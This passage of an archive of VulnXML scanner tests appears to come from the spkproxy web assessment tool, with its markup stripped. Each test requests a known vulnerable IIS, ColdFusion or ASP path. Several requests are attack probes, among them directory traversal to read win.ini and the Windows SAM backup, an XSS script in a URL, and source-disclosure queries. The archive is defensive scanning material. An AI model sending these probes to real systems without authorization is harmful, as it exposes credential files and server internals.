generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1313.xml0100664000076500007650000000706207566204543017641 0ustar davedave (iisadmpwd/aexp2.htr) "Gives domain and system name 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iisadmpwd/aexp2.htr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1314.xml0100664000076500007650000000706407566204543017644 0ustar davedave (iisadmpwd/aexp2b.htr) "Gives domain and system name 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iisadmpwd/aexp2b.htr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1315.xml0100664000076500007650000000706207566204543017643 0ustar davedave (iisadmpwd/aexp3.htr) "Gives domain and system name 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iisadmpwd/aexp3.htr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1316.xml0100664000076500007650000000706207566204543017644 0ustar davedave (iisadmpwd/aexp4.htr) "Gives domain and system name 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iisadmpwd/aexp4.htr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1317.xml0100664000076500007650000000706407566204543017647 0ustar davedave (iisadmpwd/aexp4b.htr) "Gives domain and system name 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /iisadmpwd/aexp4b.htr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1318.xml0100664000076500007650000000714307566204543017646 0ustar davedave (JUNK(10)) "Server appears to be running eEye's SecureIIS application 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /JUNK(10) HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ SecureIIS application 200 SecureIIS application 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1319.xml0100664000076500007650000000715607566204543017653 0ustar davedave (JUNK(10)abcd.html) "The IIS server may be vulnerable to Cross Site Scripting (XSS) in error messages 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /JUNK(10)abcd.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ escape 200 escape 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-131.xml0100664000076500007650000000713307566204543017555 0ustar davedave (@AdminViewError) "Sun Answerbook allows viewing of the error logs without authentication." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /ab2/@AdminViewError HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1320.xml0100664000076500007650000000720607566204543017637 0ustar davedave (nul..cfm) "ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /nul..cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template specification 200 The template specification 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1321.xml0100664000076500007650000000720607566204543017640 0ustar davedave (nul..dbm) "ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /nul..dbm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The template specification 200 The template specification 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1322.xml0100664000076500007650000000716407566204543017644 0ustar davedave (nul.cfm) "ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /nul.cfm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The requested file 200 The requested file 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1323.xml0100664000076500007650000000716407566204543017645 0ustar davedave (nul.dbm) "ColdFusion 4.0-5.0 reveal file system paths when requesting invalid DOS devices." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /nul.dbm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ The requested file 200 The requested file 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1324.xml0100664000076500007650000000751507566204543017646 0ustar davedave (null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full) "It is possible to retrieve the source of .asp files. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ &lt;html&gt; 200 &lt;html&gt; 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1325.xml0100664000076500007650000000717407566204543017650 0ustar davedave (NULL.printer) "Internet Printing (IPP) is enabled. Some versions have a DoS 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /NULL.printer HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Error in web printer install 200 Error in web printer install 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1326.xml0100664000076500007650000000704207566204543017643 0ustar davedave (prd.i/pgen/) "has MS Merchant Server 1.0" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /prd.i/pgen/ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1327.xml0100664000076500007650000000726307566204543017651 0ustar davedave (query.idq??CiTemplate=../../../../../../../../../../winnt/win.ini) "This DLL allows attackers to read files remotely." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /query.idq??CiTemplate=../../../../../../../../../../winnt/win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [fonts] 200 [fonts] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1328.xml0100664000076500007650000000702407566204543017645 0ustar davedave (sam) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sam HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1329.xml0100664000076500007650000000703407566204543017647 0ustar davedave (sam.bin) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sam.bin HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-132.xml0100664000076500007650000000742007566204543017555 0ustar davedave (index.html) "Server allows Cross Site Scripting (XSS) in 404 error messages if the code is in a directory. This may be Falcon web server." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%3cscript%3ealert(%22xss%22)%3c/script%3e/index.html HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <script>alert\('Vulnerable'\)</script> 200 <script>alert\('Vulnerable'\)</script> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1330.xml0100664000076500007650000000703007566204543017633 0ustar davedave (sam._) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sam._ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1331.xml0100664000076500007650000000710407566204543017636 0ustar davedave (samples/search/queryhit.htm) "This might be interesting..." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /samples/search/queryhit.htm HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1332.xml0100664000076500007650000000714507566204543017644 0ustar davedave (SQLQHit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /SQLQHit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1333.xml0100664000076500007650000000714507566204543017645 0ustar davedave (sqlqhit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /sqlqhit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1334.xml0100664000076500007650000000723107566204543017642 0ustar davedave (trace.axd) "The .NET IIS server has application tracing enabled. This could allow an attacker to view the last 50 web requests." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /trace.axd HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ Application Trace 200 Application Trace 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1335.xml0100664000076500007650000000710007566204543017636 0ustar davedave (upload.asp) "An ASPpage that allows attackers to upload files to server" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /upload.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1336.xml0100664000076500007650000000710207566204543017641 0ustar davedave (uploadn.asp) "An ASPpage that allows attackers to upload files to server" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /uploadn.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1337.xml0100664000076500007650000000710207566204543017642 0ustar davedave (uploadx.asp) "An ASPpage that allows attackers to upload files to server" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /uploadx.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1338.xml0100664000076500007650000000707007566204543017647 0ustar davedave (wa.exe) "An ASPpage that allows attackers to upload files to server" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /wa.exe HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1339.xml0100664000076500007650000000744007566204543017651 0ustar davedave (whatever.htr) "Reveals physical path. htr files may also be vulnerabe to an off-by-one overflow that allows remote command execution (see MS02-018)" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /whatever.htr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ <html>Error\: The requested file could not be found\. </html> 200 <html>Error\: The requested file could not be found\. </html> 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-133.xml0100664000076500007650000000726507566204543017565 0ustar davedave (%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini) "Attackers can read any file on the system. Upgrade to Analogx 1.07 or higher." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ [windows] 200 [windows] 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1340.xml0100664000076500007650000000721607566204543017642 0ustar davedave (whatever.htr) "Reveals physical path. htr files may also be vulnerabe to an off-by-one overflow that allows remote command execution (see MS02-018)" 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /whatever.htr HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1341.xml0100664000076500007650000000706707566204543017647 0ustar davedave (sam._) "Sam backup successfully retrieved." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /../../../../winnt/repair/sam._ HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1342.xml0100664000076500007650000000712407566204543017642 0ustar davedave (admin.asp) "Version 2.11 of AdMentor is vulnerable to SQL injection during login 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admentor/adminadmin.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1343.xml0100664000076500007650000000714707566204543017650 0ustar davedave (adminproc.asp) "Xpede administration page may be available. The /admin directory should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin/adminproc.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1344.xml0100664000076500007650000000721607566204543017646 0ustar davedave (datasource.asp) "Xpede administration page may be available (this page reveals SQL account name). The /admin directory should be protected." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /admin/datasource.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ 200 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1345.xml0100664000076500007650000000715107566204543017645 0ustar davedave (SQLQHit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /asp/SQLQHit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test was redirected to ${redir302}. The program that generated this test does not know how to handle 302 responses. Unfortunately, they are quite common in the Microsoft arena. Please update the generator, and rebuild these tests 302 This message indicates a failure to properly execute the test, or an unhandled HTTP response. Please investigate further, and modify this test before re-executing it. The server returned ${ResponseCode} 200 spkproxy/VulnXML/SiteTests/sitetest-1346.xml0100664000076500007650000000715107566204543017646 0ustar davedave (sqlqhit.asp) "This sample ASP allows anyone to retrieve directory listings." 0.0 .* See the description for any available information. Research this issue as well as you can, using resources like http://securityfocus.com/, and http://google.com/ GET /asp/sqlqhit.asp HTTP/1.0 The HTTP Response Code ^.*\s(\d\d\d)\s See if we got a custom error page, incorrectly implemented with a return code of 200 (404.*[Nn]ot [Ff]ound) Check to see if we are being redirected to another page ^Location: (.*)$ CHARACTERIZATION 200 CHARACTERIZATION 404 This test 